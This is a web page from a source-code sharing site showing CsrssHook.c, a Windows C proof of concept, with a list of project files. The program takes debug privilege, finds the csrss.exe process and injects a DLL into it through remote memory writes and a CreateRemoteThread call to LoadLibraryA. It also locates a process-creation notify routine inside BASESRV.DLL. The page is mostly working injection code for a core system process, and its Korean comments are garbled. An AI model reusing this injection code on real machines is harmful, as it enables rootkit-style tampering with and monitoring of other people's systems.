CsrssHook.c in csrss_hooker-startgo


this upload sample...................Original Link
    Sponsored links

			
			
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")

LPVOID Addr = NULL;
DWORD CsrssPID = 0;

VOID CheckDLL(VOID);
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID);
VOID GetDebugPrivilege(VOID);
DWORD GetCsrssProcessId(VOID);
VOID MakeDirectoryPathFromPath(LPSTR Path);

typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

typedef LONG (WINAPI *QUERYPROC)(LONG,PVOID,ULONG,PULONG);

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004L
#define SystemProcessesAndThreadsInformation 5

int main(int argc, char **argv)
{
	HANDLE hProcess, hThread;
	char FileName[260] = {0};
	DWORD WrittenBytes = 0;
	LPVOID lpStr = NULL;
	DWORD TID = 0;

	printf("==============================================\n");
	printf("[+] CSRSS.EXE Hooking PoC Code\n");
	printf("[+] Made By 荐切里捞 (ljm92201@paran.com, startgoora)\n");
	printf("==============================================\n\n");

	Addr = CsrGetCsrssProcessNotifyRoutine();
	if(!Addr)
	{
		printf("[+] Error: Can't found address Notify Routine!? Is WinNT?\n");
		return 1;
	}

	// 老窜 林家蔼阑 备秦柯促. (静柳 臼阑巴 [栖])
	printf("[+] Found Address! %08X\n", Addr);

	printf("[+] Enabling debug privilege...");
	GetDebugPrivilege();

	printf("[+] Getting CSRSS.EXE Process Id...");
	CsrssPID = GetCsrssProcessId();

	// DLL阑 夯拜利栏肺 林涝茄促.
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CsrssPID);
	if(!hProcess)
	{
		printf("[+] OpenProcess() Failed! (GetLastError: %x)\n", GetLastError());
		return 1;
	}

	// DLL String阑 持绰促.

	// 版肺甫 备茄促.
	GetModuleFileName(NULL, FileName, 260);
	// \甫 0栏肺 父电促.
	MakeDirectoryPathFromPath(FileName);
	strcat(FileName, "\\Notify.DLL");

	//printf("[+] DLL Path Name: %s\n", FileName);
	if(GetFileAttributes(FileName) == -1)
	{
		if(GetLastError() == ERROR_FILE_NOT_FOUND)
		{
			printf("[+] Notify.DLL is missing.\n");
			CloseHandle(hProcess);
			return 1;
		}
	}

	// DLL Check
	CheckDLL();

	// DLL Inject!
	lpStr = VirtualAllocEx(hProcess, NULL, strlen(FileName)+1, MEM_COMMIT, PAGE_READWRITE);
	if(!lpStr)
	{
		printf("[+] Remote Memory Allocation is failed.\n");
		CloseHandle(hProcess);
		return 1;
	}
	
	WriteProcessMemory(hProcess, lpStr, FileName, strlen(FileName)+1, &WrittenBytes);
	if(WrittenBytes < strlen(FileName))
	{
		printf("[+] WriteProcessMemory failed.\n");
		CloseHandle(hProcess);
		return 1;
	}

	hThread = CreateRemoteThread(hProcess, 
					   NULL, 
					   0, 
					   (LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "LoadLibraryA"), 
					   lpStr,
					   0,
					   &TID);
	if(hThread)
	{
		if(WaitForSingleObject(hThread, 3000) == WAIT_TIMEOUT)
		{
			printf("[+] DLL Injection Failed.\n");
			TerminateThread(hThread, 0);
			CloseHandle(hProcess);
			return 1;
		}
	} else {
		printf("[+] DLL Injection Failed.\n");
		CloseHandle(hProcess);
		return 1;
	}

	printf("[+] DLL Injection Success.\n");
	CloseHandle(hProcess);
	return 0;
}

VOID CheckDLL(VOID)
{
	HANDLE hSnapShot = NULL;
	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, CsrssPID);
	if(hSnapShot != INVALID_HANDLE_VALUE)
	{
		BOOL ret = FALSE;
		MODULEENTRY32 me;
		memset(&me, 0, sizeof(MODULEENTRY32));
		me.dwSize = sizeof(MODULEENTRY32);
		ret = Module32First(hSnapShot, &me);
		while(ret)
		{
			//printf("[+] Module Name: %s", me.szModule);
			if(strcmpi(me.szModule, "notify.dll") == 0){
				printf("[+] ERROR! Already Injected.");
				CloseHandle(hSnapShot);
				exit(1);
			}
			ret = Module32Next(hSnapShot, &me);
		}
		CloseHandle(hSnapShot);
	}
}

VOID MakeDirectoryPathFromPath(LPSTR Path)
{
	int i;
	for(i = strlen(Path) - 1; i >= 0; i--)
	{
		if(Path[i] == '\\'){
			Path[i] = 0;
			return;
		}
	}
}

DWORD GetCsrssProcessId(VOID)
{
	HMODULE hNtDLL = NULL;
	HANDLE ProcessHandle = NULL;
	QUERYPROC QueryProc = NULL;
	LPVOID Buffer = NULL;
	PCHAR CurrentPtr = NULL;
	DWORD Needed = 0;
	LONG status = 0;
	SYSTEM_PROCESS_INFORMATION proc;
	CHAR ModuleName[255] = {0};

	Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(SYSTEM_PROCESS_INFORMATION));
	if(!Buffer)
	{
		printf(" Failed! Memory Allocation is failed.\n");
		exit(1); return 0;
	}

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	QueryProc = (QUERYPROC)GetProcAddress(hNtDLL, "ZwQuerySystemInformation");
	if(!QueryProc){
		printf(" Failed! ZwQuerySystemInformation is not supported.\n");
		exit(1); return 0;
	}
	
	// Get Process List
	Needed = sizeof(SYSTEM_PROCESS_INFORMATION);
	status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, sizeof(SYSTEM_PROCESS_INFORMATION), &Needed);
	if(status == STATUS_INFO_LENGTH_MISMATCH)
	{
		if(Needed != 0)
		{
			Buffer = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Needed);
			if(!Buffer){
				printf(" Failed! Memory Reallocation is failed.\n");
				exit(1); return 0;
			}

			status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Needed, &Needed);
		} else {
			while(status == STATUS_INFO_LENGTH_MISMATCH)
			{
				DWORD Dummy;

				Needed += sizeof(SYSTEM_PROCESS_INFORMATION);
				Buffer = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Needed);
				if(!Buffer){
					printf(" Failed! Memory Reallocation is failed.\n");
					exit(1); return 0;
				}

				status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Needed, &Dummy);
			}
		}
	}
	
	if(status)
	{
		printf(" Failed! ZwQuerySystemInformation failed in unknown reason (NTSTATUS %08X)\n", status);
		exit(1); return 0;
	}

	CurrentPtr = Buffer;
	proc = *(PSYSTEM_PROCESS_INFORMATION) CurrentPtr;
	while(proc.NextEntryOffset)
	{
		// printf("[+] Traversing... %d\n", proc.UniqueProcessId);
		ProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, (DWORD) proc.UniqueProcessId);
		if(ProcessHandle)
		{
			RtlFillMemory(ModuleName, 255, 0);
			GetModuleBaseName(ProcessHandle, NULL, ModuleName, 255);
			if(strcmpi(ModuleName, "csrss.exe") == 0)
			{
				printf(" Success! (PID: %d)\n", proc.UniqueProcessId);
				return (DWORD) proc.UniqueProcessId;
			}
			CloseHandle(ProcessHandle);
		}
		CurrentPtr += proc.NextEntryOffset;
		proc = *(PSYSTEM_PROCESS_INFORMATION) CurrentPtr;
	}

	HeapFree(GetProcessHeap(), 0, Buffer);
	printf(" Failed! CSRSS.exe is missing.\n");
	exit(1);
	return 0;
}

VOID GetDebugPrivilege(VOID)
{
	HMODULE hNtDLL = NULL;
	LPVOID PrivProc = NULL;
	DWORD Dummy = 0;
	hNtDLL = GetModuleHandle("NTDLL.DLL");
	if(!hNtDLL)
	{
		printf(" Failed! Is WinNT?\n");
		exit(1); return;
	}

	PrivProc = (LPVOID) GetProcAddress(hNtDLL, "RtlAdjustPrivilege");
	if(!PrivProc)
	{
		printf(" Failed! RtlAdjustPrivilege is not supported.\n");
		exit(1); return;
	}
	
	((VOID (WINAPI*)(DWORD,BOOL,BOOL,LPDWORD))PrivProc)(20, 1, 0, &Dummy);

	printf(" Success\n");
}

LPVOID CsrGetCsrssProcessNotifyRoutine(VOID)
{
	HMODULE hBaseSrv = NULL;
	PCHAR NotifyProc = NULL;
	int i = 0;
	hBaseSrv = GetModuleHandle("BASESRV.DLL");
	if(!hBaseSrv){
		hBaseSrv = LoadLibrary("BASESRV.DLL");
		if(!hBaseSrv) return NULL;
	}
	NotifyProc = (PCHAR)GetProcAddress(hBaseSrv, "BaseSetProcessCreateNotify");
	if(!NotifyProc)	return NULL;

	for(;i < 64;)
	{
		if(NotifyProc[i] == (CHAR) 0xA3) // MOV DWORD PTR [XXXXXXXX], EAX
		{
			return *(LPVOID *)(NotifyProc + i + 1);
		}
		i++;
	}
	return NULL;
}
			click here to download the whole source code package.

			
			


Project Files

    Sponsored links
NameSizeDate
 CsrssHook.exe32.00 kB04-17-08 22:02
 Notify.dll40.00 kB01-18-08 10:03
 CsrssHook.c7.76 kB04-17-08 22:01
 CsrssHook.dsp3.35 kB01-18-08 00:02
 CsrssHook.dsw543.00 B01-18-08 00:02
 CsrssHook.ncb41.00 kB04-17-08 22:02
 CsrssHook.opt52.50 kB04-17-08 22:02
 CsrssHook.plg1.08 kB04-17-08 22:02
 Notify.c1.99 kB01-18-08 10:03
 NotifyDLL.dsp3.99 kB01-18-08 09:48
 NotifyDLL.dsw543.00 B01-18-08 09:33
 NotifyDLL.ncb33.00 kB01-18-08 10:04
 NotifyDLL.opt52.50 kB01-18-08 10:04
 NotifyDLL.plg1.17 kB01-18-08 10:03
...

Related Items

    Sponsored links